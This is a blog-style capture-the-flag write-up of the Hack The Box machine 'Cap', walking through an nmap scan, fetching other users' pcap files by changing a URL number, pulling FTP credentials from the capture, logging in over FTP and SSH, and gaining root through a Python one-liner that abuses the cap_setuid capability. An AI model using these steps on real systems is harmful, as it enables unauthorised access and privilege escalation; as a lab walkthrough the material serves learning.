CAP CTF – HTB

Byaghanim

This is an interesting CTF where, based on the name of this machine, I’ll have to analyze a pcap file and try to get some information out of it. So as always, I start with the enumeration stage.

Enumeration

nmap -sV -A -oN result.nmap 10.10.10.245
---------------------------------------
# Nmap 7.91 scan initiated Tue Jun 22 12:12:53 2021 as: nmap -sV -A -oN result.nmap2 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Tue, 22 Jun 2021 11:25:24 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Tue, 22 Jun 2021 11:25:18 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Tue, 22 Jun 2021 11:25:18 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   44.02 ms 10.10.14.1
2   44.06 ms 10.10.10.245

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 22 12:15:18 2021 -- 1 IP address (1 host up) scanned in 145.09 second

From the NMAP scan I see that port 21, 22 and 80 are open. Lets check out the webserver.

I’m already logged in as the user Nathan. On the dashboard there are vizualisation for Security events, failed login attempts and port scans.

On the “Security Snapshot (5 second PCAP + Analysis)” I can see from the URL that it point us to 10.10.10.245/data/8. We can try and change the last number and see if we find any data.

We’ll download the pcap file and analyze it with WireShark. We know from our enumeration stage that the server uses FTP on port 21. Search for FTP in WireShark.

From the WireShark we found a username and a password. We’ll log into FTP with the username and password.

Gaining Access

ftp 10.10.10.245 
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:aghanim): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 0        1001            0 Jun 28 05:24 2
drwxr-xr-x    3 1001     1001         4096 Jun 28 08:06 snap
-r--------    1 1001     1001           33 Jun 28 03:08 user.txt
226 Directory send OK.

From here we find the first user flag.

We also know from the enumeration stage that port 22 is open. I’ll use the username and password to log into SSH. 

ssh nathan@10.10.10.245 
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

Last login: Mon Jun 28 09:55:58 2021 from 10.10.14.55

nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

Privilege Escalation

Now I’ll search to see if the user have sudo rights, SUID and capabilites to see if we can escalate our privileges. 

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

From gtfobins.github.io: If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

So I’ll try to use the command 

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# ls -la /root                                               
total 36
drwx------  6 root root 4096 May 27 09:16 .
drwxr-xr-x 20 root root 4096 Jun  1 10:09 ..
lrwxrwxrwx  1 root root    9 May 15 21:40 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 May 23 19:17 .cache
drwxr-xr-x  3 root root 4096 May 23 19:17 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4096 May 23 19:17 .ssh
lrwxrwxrwx  1 root root    9 May 27 09:16 .viminfo -> /dev/null
-r--------  1 root root   33 Jun 28 03:08 root.txt
drwxr-xr-x  3 root root 4096 May 23 19:17 snap
#

Similar Posts

ArcheType CTF – HTB

ArcheType CTF – HTB

Byaghanim

Table Of ContentsEnumerationGain accessPrivSec Enumeration In the enumeration stage I start off by doing an NMAP scan. There are a couple of interesting ports open, among other things port 445 (SMB) and 1433 (mssql). I’ll run ‘enum4linux’ against the server. The interesting take from that scan was that it dosent require username or password to…

One Comment

Comments are closed.